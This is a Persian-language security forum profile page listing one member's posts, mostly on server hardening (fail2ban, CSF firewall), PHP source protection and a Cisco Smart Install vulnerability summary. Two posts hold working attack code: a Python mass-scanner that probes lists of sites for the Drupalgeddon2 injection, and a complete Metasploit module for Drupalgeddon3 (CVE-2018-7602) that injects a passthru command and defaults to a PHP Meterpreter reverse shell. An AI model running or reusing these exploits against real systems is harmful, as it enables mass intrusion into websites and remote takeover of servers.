با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.
-
تعداد ارسال ها
105 -
تاریخ عضویت
-
آخرین بازدید
-
روز های برد
2
آخرین بار برد Nazanin Wild در دی 7 2020
Nazanin Wild یکی از رکورد داران بیشترین تعداد پسند مطالب است !
اعتبار در سایت
5 Neutralدرباره Nazanin Wild
- تاریخ تولد 01/07/1994
Converted
-
Programming language
خیر
آخرین بازدید کنندگان نمایه
بلوک آخرین بازدید کننده ها غیر فعال شده است و به دیگر کاربران نشان داده نمی شود.
-
-
@Reza.Black سلام میشه یک پست در رابطه با کلیه مباحث فازینگ بصورت جامع قرار دهید؟
-
راهنمای در مورد الگوی فراموش شده
Ruiner پاسخی برای موضوع ارسال کرد برای یک Nazanin Wild در Mobile Q/A
سلام , اگر سامسونگ اکانت ساخته باشی و به نت وصل باشه خیلی راحت میتونی برداری پترن رو علاوه بر Pattren , پسورد هم یادتون رفته؟!- 2 پاسخ
-
- 3
-
-
Nazanin Wild شروع به دنبال کردن تغییر مسیر Phpmyadmin در کنترل پنل Directadmin، نصب Fail2ban بر روی Centos 7، *سوال*چگونه با یوزر رووت جدید لاگین کنیم و و 6 کاربر دیگر کرد
-
اگه واقعا هکری ای پی سیستممو میدم بیا هکش کن...
-
شماها فقط دارین اسم هک رو خراب میکنین همین وگرنه همه میتونن با یه سرچ با دورک یا هرچیز دیگه ای هک کنن
-
نصب Fail2ban بر روی Centos 7
Nazanin Wild پاسخی برای موضوع ارسال کرد برای یک Nazanin Wild در آموزش و امنیت سایت و سرورهای لینوکس
دستورات فعال سازی و استارت یادم رفت ! systemctl enable fail2ban systemctl start fail2ban- 1 پاسخ
-
- افزایش امنیت centos
- امنیت سرور
-
(و 1 مورد دیگر)
برچسب زده شده با :
-
نصب Fail2ban بر روی Centos 7
یک موضوع پاسخی ارسال کرد برای Nazanin Wild در آموزش و امنیت سایت و سرورهای لینوکس
Install fail2ban on centos 7 fail2ban یک ابزار جهت افزایش امنیت سرور و نظارت بر روی سرویس ها , پروتکل , پورت ها و دیگر منابع میباشد . که با نظارت بر روی این موارد در صورت مشاهده رفتار مشکوک , block میکند . بطور مثال میتوانیم با اضافه کردن یک رول مبنی بر سرویس ssh در صورت تلاش یک ای پی برای ورود غیرمجاز و تشخیص آن توسط fail2ban دسترسی ای پی مورد نظر مسدود شود . مبنای کار fail2ban هم به طوری هست که با مشخص کردن رول های خود و سرویس های خود ان هارا بصورت مداوم چک کرده و در صورت مشاهده رفتار مشکوک بصورت یکپارچه با فایروال , مانع دسترسی غیرمجاز میشود . نحوه نصب fail2ban به ssh سرور خود متصل شوید و با دستور زیر ابتدا سیستم عامل خود را بروز کنید : yum -y update مخزن epel را نصب میکنیم : yum -y install epel سپس fail2ban را نصب میکنیم : yum -y install fail2ban کانفیگ و تنظیمات fail2ban هم در پست بعدی در خدمت شما هستیم .- 1 پاسخ
-
- افزایش امنیت centos
- امنیت سرور
-
(و 1 مورد دیگر)
برچسب زده شده با :
-
جلوگیری از حملات DDOS با استفاده از CSF
Nazanin Wild پاسخی برای موضوع ارسال کرد برای یک Nazanin Wild در آموزش و امنیت سایت و سرورهای لینوکس
نصب فایروال CSF نصب csf بصورت خلاصه و ساده install csf.zip -
programming تاپیک مشکلات شما در Python
Factorial پاسخی برای موضوع ارسال کرد برای یک Nazanin Wild در Python
اگر اشتباه نکنم فکر میکنم با استفاده از متد str.encode() امکان پذیر است . "Matn morede nazar".encode(encoding="UTF-8") -
*سوال*چگونه با یوزر رووت جدید لاگین کنیم
Unkn0wn پاسخی برای موضوع ارسال کرد برای یک Nazanin Wild در تست نفوذ پذیری سرورها
سلام , بستگی به مشخصات سرور داره ولی در حالت نرمال , اگر linux باشه بااستفاده از Secure shell یا ssh قابلیت اتصال رو به سرور دارین ... -
question سوال درمورد تامیین امنیت کدهای Php از کپی شدن
mohsensd1373 پاسخی برای موضوع ارسال کرد برای یک Nazanin Wild در Web Application Security Q/A
از sourceguardian استفاده کنید با محدودیت خاص ... ارتباط از طریق iframe ؟ فکر نمیکنم برای ارتباط باشه -
question سوال درمورد تامیین امنیت کدهای Php از کپی شدن
mohsensd1373 پاسخی برای موضوع ارسال کرد برای یک Nazanin Wild در Web Application Security Q/A
@mohsensd1373 سلام خدمت شما , درمورد بحث جلوگیری از کپی و سو استفاده راه صد در صدی وجود نداره چرا که در هر صورت امکان Decode و دسترسی به سورس نرم افزار میباشد . بنده با توجه به تجربه ناچیز خود چند راهکار ارائه خواهم داد : 1-استفاده از ioncube که با رمز گذاری بر روی فایل های php امکان دسترسی به فایل اصلی php رو از بقیه سلب خواهید کرد . در صورتی که خواستید از این روش استفاده کنید اطلاع دهید روش استفاده رو ذکر کنم ... 2- استفاده از sourceguardian میباشد که قابلیت رمزنگاری سورس برنامه و قفل گذاری را میباشد یکی از ویژگی های مهم این نرم افزار قابلیت قردادن , domain name , Server ip Address و تاریخ لایسنس برای نرم افزار خود میباشد . یکی دیگر از ویژگی های مثبت sourceguardian , درصورت تغییر حتی بخش کوچکی از در فایل encode شده کل برنامه از کار خواهد افتاد ... سایت اصلی این نرم افزار : https://www.sourceguardian.com/ جهت استفاده نیاز به لایسنس دارید که فکر میکنم توسط مدیریت قابل تهیه خواهید بود . @root3r -
اسکنر اسیب پذیری Drupal Geddon2
یک موضوع پاسخی ارسال کرد برای Nazanin Wild در ابزار و مقالات Scanners
Drupalgeddon2 Scanner import os import workerpool import requests from lxml.html import fromstring import sys import re from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) siteslistx=sys.argv[1] temp="{0:10}" def check_if_drupal(host): temp="{0:10}" headers = { 'User-Agent': 'Firefox/58.0', 'Accept-Language': 'en-US,en;q=0.5', } try: myopen = requests.get(host,timeout=5,allow_redirects=True,headers=headers) except: return 0 response = myopen.text if response.find("sites/all/")!=-1: print temp.format("\033[95m + Drupal detected @ "+host+"\n\033[0m"), xx=open("drupal.txt","ab") xx.write(host+"\r\n") xx.close() return 1 return 0 def is_vulnerable1(HOST): get_params = {'q':'user/password', 'name[#post_render][]':'printf', 'name[#markup]':'Jnkfoooo', 'name[#type]':'markup'} post_params = {'form_id':'user_pass', '_triggering_element_name':'name'} headers = { 'User-Agent': 'Firefox/58.0', 'Accept-Language': 'en-US,en;q=0.5', } r = requests.post(HOST, data=post_params, params=get_params,headers=headers) m = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text) if m: found = m.group(1) get_params = {'q':'file/ajax/name/#value/' + found} post_params = {'form_build_id':found} r = requests.post(HOST, data=post_params, params=get_params) if re.match(r'^Jnkfooo.*',r.text): print temp.format("\033[92m + "+HOST+" is vulnerable \033[0m\n"), pew=open("vuln.txt","ab") pew.write(HOST+"\r\n") pew.close() return 1 else: return 0 def scan(host): host=host.strip("\r\n")+"/" is_drupal=check_if_drupal(host) if is_drupal == 1: is_vulnerable1(host) print "+ Drupal scanner module launched" print "! Processing websites from "+siteslistx siteslist=open(siteslistx,"r") pool = workerpool.WorkerPool(size=100) pool.map(scan, siteslist) pool.shutdown() pool.wait() print "! Done" sys.exit() -
security بحران امنیتی Remote Code Execution در Drupal V8 & V7
root3r پاسخی برای موضوع ارسال کرد برای یک Nazanin Wild در تحلیل و بررسی آسیب پذیری های سایت و سرورها
Drupal < 7.58 - 'Drupalgeddon3' Authenticated Remote Code (Metasploit) Metasploit Framework برای اسیب پذیری Drupalgeddon دروپال ... ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => 'Drupalgeddon3', 'Description' => %q{ CVE-2018-7602 / SA-CORE-2018-004 A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site Which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution The module can load msf PHP arch payloads, using the php/base64 encoder. The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));' }, 'License' => MSF_LICENSE, 'Author' => [ 'SixP4ck3r', # Research and port to MSF 'Blaklis' # Initial PoC ], 'References' => [ ['SA-CORE', '2018-004'], ['CVE', '2018-7602'], ], 'DefaultOptions' => { 'encoder' => 'php/base64', 'payload' => 'php/meterpreter/reverse_tcp', }, 'Privileged' => false, 'Platform' => ['php'], 'Arch' => [ARCH_PHP], 'Targets' => [ ['User register form with exec', {}], ], 'DisclosureDate' => 'Apr 29 2018', 'DefaultTarget' => 0 )) register_options( [ OptString.new('TARGETURI', [ true, "The target URI of the Drupal installation", '/']), OptString.new('DRUPAL_NODE', [ true, "Exist Node Number (Page, Article, Forum topic, or a Post)", '1']), OptString.new('DRUPAL_SESSION', [ true, "Authenticated Cookie Session", '']), ]) register_advanced_options( [ ]) end def uri_path normalize_uri(target_uri.path) end def start_exploit drupal_node = datastore['DRUPAL_NODE'] res = send_request_cgi({ 'cookie' => datastore['DRUPAL_SESSION'], 'method' => 'GET', 'uri' => "#{uri_path}/node/#{drupal_node}/delete" }) form_token = res.body.scan( /form_token" value="([^>]*)" \/>/).last.first print "[*] Token Form -> #{form_token}\n" r2 = send_request_cgi({ 'method' => 'POST', 'cookie' => datastore['DRUPAL_SESSION'], 'uri' => "#{uri_path}/?q=node/#{drupal_node}/delete&destination=node?q[%2523post_render][]=passthru%26q[%2523type]=markup%26q[%2523markup]=php%20-r%20'#{payload.encoded}'", 'vars_post' => { 'form_id' => 'node_delete_confirm', '_triggering_element_name' => 'form_id', 'form_token'=> "#{form_token}" } }) form_build_id = r2.body.scan( /form_build_id" value="([^>]*)" \/>/).last.first print "[*] Token Form_build_id -> #{form_build_id}\n" r3 = send_request_cgi({ 'method' => 'POST', 'cookie' => datastore['DRUPAL_SESSION'], 'uri' => "#{uri_path}/?q=file/ajax/actions/cancel/%23options/path/#{form_build_id}", 'vars_post' => { 'form_build_id' => "#{form_build_id}" } }) end def exploit case datastore['TARGET'] when 0 start_exploit else fail_with(Failure::BadConfig, "Your target is invalid.") end end end- 3 پاسخ
-
- drupal remote code execution vulnerability
- drupal vulnerability
-
(و 1 مورد دیگر)
برچسب زده شده با :
-
Cisco Ios And Ios Remote Code Execution Vulnerability ( Rce )
blackops پاسخی برای موضوع ارسال کرد برای یک Nazanin Wild در اخبار دنیای امنیت
سلام بسیار هم عالی فکر میکنم اولین مرجع فارسی هست که به این آسیب پذیری اشاره کرد ! اسیب پذیری که در ویژگی Smart Install بوجود اومد منجر به ایجاد دسترسی هکر یا نفوذ گر بصورت remote خواهد شد . این اسیب پذیری که به علت اعتبار سنجی نادرست پکت های data میباشد نفوذگر رو قادر میسازد با ایجاد و ارسال Smart Install message بر روی پورت 4786 TCP و سر ریز بافر منجر به : بازگردانی تنظیمات به حالت پیشفرض (راه اندازی مجدد) اجرای کد های مدنظر بر روی دستگاه ها اخر ایجاد یک حلقه نامحدود و وقوع حالت کرش شود- 4 پاسخ
-
- cisco ios rce
- remote code
-
(و 2 مورد دیگر)
برچسب زده شده با :
تاریخچه انجمن امنیتی ایران سایبر
شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.
این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.
آدرس های داخلی شرکت
آدرس های داخلی شرکت
رعایت قوانین
شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.